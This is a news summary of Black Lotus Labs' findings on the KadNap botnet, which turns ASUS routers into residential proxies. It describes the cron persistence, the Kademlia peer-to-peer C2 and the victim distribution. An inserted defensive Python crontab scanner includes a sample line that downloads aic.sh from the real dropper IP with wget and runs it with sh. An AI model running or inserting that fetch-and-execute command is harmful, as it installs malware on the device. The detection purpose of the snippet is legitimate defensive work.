KadNap Botnet Hijacks ASUS Routers for Proxy Network

By alex2404

A botnet called KadNap has infected 14,000 edge networking devices since August 2025, hijacking ASUS routers to build a proxy network tied to a cybercrime service, according to researchers at Black Lotus Labs.

The malware converts compromised devices into residential proxies sold through a service called Doppelganger, which researchers believe is a rebrand of the Faceless proxy service — previously linked to the TheMoon malware botnet, which also targeted ASUS hardware. Those proxies are used to funnel malicious traffic, build anonymization layers, and bypass blocklists, enabling attacks including DDoS, credential stuffing, and brute-force campaigns.

How KadNap Spreads and Hides

Infections begin when a malicious shell script, aic.sh, is downloaded from 212.104.141[.]140. The script establishes persistence through a cron job firing every 55 minutes. It then drops an ELF binary named kad, which installs the botnet client, determines the host’s external IP address, and contacts multiple Network Time Protocol servers to retrieve the current time and system uptime.
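As an added defender-side illustration (not code from the article or from Black Lotus Labs), the check below scans a per-user crontab for the persistence traits described above: a 55-minute cron interval, the dropper host, and the file names aic.sh and kad. The sample crontab is constructed, and its download command line is illustrative; only the IP and file names come from the article.

```python
import re

# Indicators from the article (the IP is printed defanged there as 212.104.141[.]140).
KADNAP_DROPPER_HOST = "212.104.141.140"
KADNAP_FILE_NAMES = ("aic.sh", "kad")
KADNAP_CRON_MINUTES = 55

# Five time fields followed by the command (per-user crontab layout;
# the /etc/crontab variant with a user column is not handled here).
CRON_RE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")


def cron_findings(crontab_text):
    """Return (line number, command, reasons) for entries matching KadNap traits."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        match = CRON_RE.match(line)
        if not match:
            continue
        minute, command = match.group(1), match.group(6).strip()
        reasons = []
        if minute == f"*/{KADNAP_CRON_MINUTES}":
            reasons.append("55-minute interval")
        if KADNAP_DROPPER_HOST in command:
            reasons.append("dropper host")
        # Match the file names only as whole path components, not as substrings.
        if any(re.search(rf"(^|[\s/]){re.escape(n)}(\s|$)", command)
               for n in KADNAP_FILE_NAMES):
            reasons.append("known file name")
        if reasons:
            findings.append((lineno, command, reasons))
    return findings


# Constructed sample crontab: one entry mimicking the described persistence
# and two benign entries. The download command line is illustrative only.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/55 * * * * wget -q -O /tmp/aic.sh http://212.104.141.140/aic.sh && sh /tmp/aic.sh
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
30 * * * * /usr/bin/ntpdate -u pool.ntp.org
"""


def scan_sample_crontab():
    """Run the check over the constructed sample; flags only line 2."""
    return cron_findings(SAMPLE_CRONTAB)
```

Any one of the three reasons on its own is a weak signal (many legitimate jobs use coarse intervals); the combination on a single entry is what merits a closer look at the host.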

For command-and-control communications, KadNap uses a modified version of the Kademlia Distributed Hash Table protocol, designed to conceal C2 infrastructure within a peer-to-peer network. “Infected devices use the DHT protocol to locate and connect with a command-and-control server, while defenders cannot easily find and add those C2s to threat lists,” the researchers explain.

The decentralization, however, is imperfect. Black Lotus Labs found that infected devices consistently connect to two specific nodes before reaching C2 servers — a weakness in the implementation that allowed researchers to map the control infrastructure despite the protocol’s obfuscation design.

Network Breakdown

Nearly half of the botnet’s nodes connect to C2 infrastructure dedicated specifically to ASUS-based bots. The remaining devices communicate with two separate control servers. Geographically, 60% of infected devices are located in the United States, with notable concentrations also reported in Taiwan, Hong Kong, and Russia.

Lumen Technologies, the parent company of Black Lotus Labs, says it has blocked all network traffic to and from the known control infrastructure on its own network. The company acknowledges the disruption is limited to its own systems and says a list of indicators of compromise will be released to help other operators act against the botnet independently.

The connection to Doppelganger and its predecessor services points to an established commercial model: operators build botnets from consumer and small-business routers, then sell access to the infected pool as a proxy service. The end customers of that service bear the direct exposure to the attacks it enables, while the actual victims are the device owners whose hardware is quietly recruited into the network.


This article is a curated summary based on third-party sources.
